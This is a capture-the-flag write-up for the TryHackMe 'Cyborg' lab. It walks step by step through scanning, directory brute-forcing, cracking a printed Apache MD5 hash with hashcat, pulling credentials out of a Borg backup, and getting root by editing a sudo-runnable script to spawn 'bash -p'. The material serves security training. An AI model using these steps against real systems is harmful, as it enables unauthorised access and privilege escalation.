TryHackMe: Cyborg writeup/walkthrough
Writeup for the room ‘Cyborg’ on TryHackMe
Room Link | Easy difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.
Table of content
Task 1: Deploy the machine
#1. Deploy the machine
No answer needed. Make sure you are connected with your VPN and wait a few minutes for the machine to start.
sudo openvpn --config <THM_VPN_file>Task 2: Compromise the system
#1. Scan the machine, how many ports are open?
nmap <Cyborg_Machine_IP> -v -sV -A -T4
As you can see, only 2 ports are open, 22 and 80.
#2. What service is running on port 22?
See image above for reference. ssh is running on port 22.
#3. What service is running on port 80?
See image above for reference. http is running on port 22.
#4. What is the user.txt flag?
We can bruteforce directories using dirbuster and directory-list-2.3-medium.txt list.
When bruteforcing directories, we will find some interesting pages and files like /admin, /admin/admin.html, etc/squid/passwd and etc/squid/squid.conf
The /etc/admin/admin.html reveals that someone left some backup files which we can try to take advantage of.
The /etc/squid/passwd contains a password hash which we can try to crack.
Using Hashes.com, we can find the hash type so that we can crack it using hashcat.
The hashcat hash examples page has the correct format that we can use to store the hash for Apache $apr1$ MD5 hash.
hashcat --help | grep 'Apache'
locate rockyou.txt
cp <path output from the command above> ./
echo '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.' > hash.txt
hashcat -m 1600 hash.txt rockyou.txt
I was able to get the password very quickly. Let’s take note of that password.
Next, download the archive at /admin/archive.tar and extract it in your working directory. Move into the extracted directory and go in final_archive directory:
cd home/field/dev/final_archive/
cat README
Reading the README file shows us that there is a Borg backup repository here so we can can get that backup file back using Borg.
sudo apt install borgbackup -yTest to see if borg is installed by just typing borg and then pressing Enter. If it says not found or something similar, close and re-open terminal to try again. Now we can make a directory and use borg to mount the backup there:
borg
mkdir backup
borg mount . backup/# It will ask for password and we can try the password we cracked using hashcat.cd backup/music_archive/home/alex/Documents
cat note.txt# This will have a username & password. Earlier in our nmap scan, we found an open port for ssh at port 22. Lets try this username and password there.
ssh alex@<Cyborg_Machine_IP># We can enter the password we found in the backup from borg.ls
cat user.txt
#5. What is the root.txt flag?
Let’s check if we can run anything as root.
sudo -l
# You'll see that there is a file that we can run as sudo (backup.sh)cd /etc/mp3backups/
ls -la backup.sh
# As we are logged in as alex, we can only read it right now but let's change that since we alex owns the file. We can change it's permission using:chmod +777 backup.sh
# Now backup.sh should have all permission (-rwxrwxrwx)ls -la backup.sh# Let's add the command to run a bash shell and maintain the root privilege using the -p option. See image below to see where to add the command.nano backup.sh
bash -p# Ctrl + X, press y and then press Enter to save. Let's confirm that the edit we made is saved.head backup.sh# Please note that we can't run sudo backup.sh, we can only run sudo /etc/mp3backups/backup.sh sudo /etc/mp3backups/backup.sh
id
# You should be root now.
# Go into root directory and cat the root flag.cd ~/../../root/
ls
cat root.txt
That’s all for this room. Follow me for more writeups and see you in the next one!